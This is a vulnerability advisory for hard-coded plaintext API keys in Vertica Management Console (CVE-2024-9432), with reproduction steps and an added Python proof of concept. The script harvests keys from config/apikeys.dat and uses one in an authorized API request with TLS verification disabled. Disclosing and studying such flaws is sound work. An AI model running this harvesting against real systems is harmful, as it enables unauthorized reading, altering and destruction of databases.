Vulnerability Description: Use of Hard-coded Credentials - CWE-798
Software Version: 10.1.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9432
CVSS:
Severity:
Credits: Davide Brian Di Campi, Massimiliano Brolli
The product creates, stores, and uses hard-coded plaintext keys that are needed for authorization when calling protected APIs.
Step-by-step instructions and PoC
An attacker with access to the system where the Vertica Management Console is installed can retrieve valid API keys from disk and use them to create, modify and destroy Vertica’s data and processes, including data held on other systems (in the example below, we have access to a machine with IP 10.X.X.35 and can operate on data stored on another machine with IP 10.X.X.33). Moreover, the file cannot be moved, renamed or deleted as a workaround: the product reads it internally, and some features stop working when it is missing.
Steps to reproduce:
1) Log in to the system where the Vertica Management Console is installed and navigate to the installation directory. Inside the “config” folder you will find the file “apikeys.dat”, which contains the plaintext list of valid API keys along with other information such as each key’s security level.
2) You can now use those keys to make authorized requests to the Vertica Management Console APIs: add a “VerticaApiKey” header carrying one of the keys to the API request.
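The two steps above, as an added worked example written for this page (it is not part of the original advisory and not Vertica’s code). It reads config/apikeys.dat under the Management Console install directory, pulls out every key-shaped token, reports whether the file is readable by users other than its owner, and then sends a request carrying one of the keys in the VerticaApiKey header. Assumptions not confirmed by the advisory: the sample apikeys.dat content is constructed, the key-token pattern is a heuristic, and the endpoint path DEFAULT_PATH is a placeholder.

```python
"""Added example for the reproduction steps: harvest keys from
config/apikeys.dat, then call the Management Console with them.
Illustrative code written for this page, not the advisory's or Vertica's.
"""
import re
import ssl
import stat
import sys
import urllib.request
from pathlib import Path

# Constructed sample standing in for config/apikeys.dat; the real file's
# layout is not documented in the advisory, so this format is an assumption.
SAMPLE_APIKEYS_DAT = """\
# apikeys.dat - constructed sample, not the real file layout
mcadmin   ADMIN   3f9c1e7a5b2d48c0e6a1f4b7d9c2e8a5
reporter  READ    b81d0c44a9e2f6d7c3b5a0e1f9d8c7b6
"""

# Heuristic: long runs of key-alphabet characters. Tune against the real file.
KEY_TOKEN = re.compile(r"[A-Za-z0-9_\-+/=]{24,}")

# Placeholder endpoint path (assumption); any protected MC API path works.
DEFAULT_PATH = "/webui/api/v1/status"


def extract_candidate_keys(text: str) -> list:
    """Return key-shaped tokens from apikeys.dat content, skipping comments."""
    keys = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        keys.extend(KEY_TOKEN.findall(line))
    return keys


def auth_headers(api_key: str) -> dict:
    """The advisory's authorization mechanism: the VerticaApiKey header."""
    return {"VerticaApiKey": api_key, "Accept": "application/json"}


def readable_by_others(path: Path) -> bool:
    """True if group or world can read the file: the 'access to the system'
    precondition is weaker than root when this is the case."""
    mode = path.stat().st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def harvest_keys(install_dir: Path) -> list:
    """Step 1: read <install>/config/apikeys.dat and pull out the keys."""
    keyfile = install_dir / "config" / "apikeys.dat"
    text = keyfile.read_text(encoding="utf-8", errors="replace")
    return extract_candidate_keys(text)


def call_console(base_url: str, api_key: str, path: str = DEFAULT_PATH,
                 method: str = "GET", timeout: int = 10):
    """Step 2: authorized request using a harvested key."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False        # MC is commonly deployed with a self-signed cert
    ctx.verify_mode = ssl.CERT_NONE   # acceptable only in a test lab
    req = urllib.request.Request(base_url.rstrip("/") + path, method=method)
    for name, value in auth_headers(api_key).items():
        req.add_header(name, value)
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    # usage: poc.py <mc_install_dir> [https://mc-host:5450]
    if len(sys.argv) < 2:
        print("keys in constructed sample:",
              extract_candidate_keys(SAMPLE_APIKEYS_DAT))   # offline demo
        sys.exit(0)
    install = Path(sys.argv[1])
    keyfile = install / "config" / "apikeys.dat"
    print(f"{keyfile}: readable by others = {readable_by_others(keyfile)}")
    keys = harvest_keys(install)
    print(f"{len(keys)} candidate key(s) found")
    if len(sys.argv) > 2 and keys:
        status, body = call_console(sys.argv[2], keys[0])
        print(status, body[:200])
```

Run with no arguments to exercise the parser against the constructed sample; pass the install directory (and optionally the console URL) to run the actual two steps in a lab. The permission check is only a triage aid: since the advisory states the file cannot be removed or renamed without breaking the product, tightening its mode narrows who on the host can read the keys but does not remove the hard-coded credentials themselves.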
Security Impact
An attacker who has gained access to the system can obtain valid API keys and make authorized requests to the Vertica Management Console APIs. This can lead to the compromise of databases and processes, including those on other systems. Since sensitive APIs exist that create, modify and destroy data, an attacker who has found the hard-coded keys can read all of the databases’ information, manipulate and destroy data, and shut down services.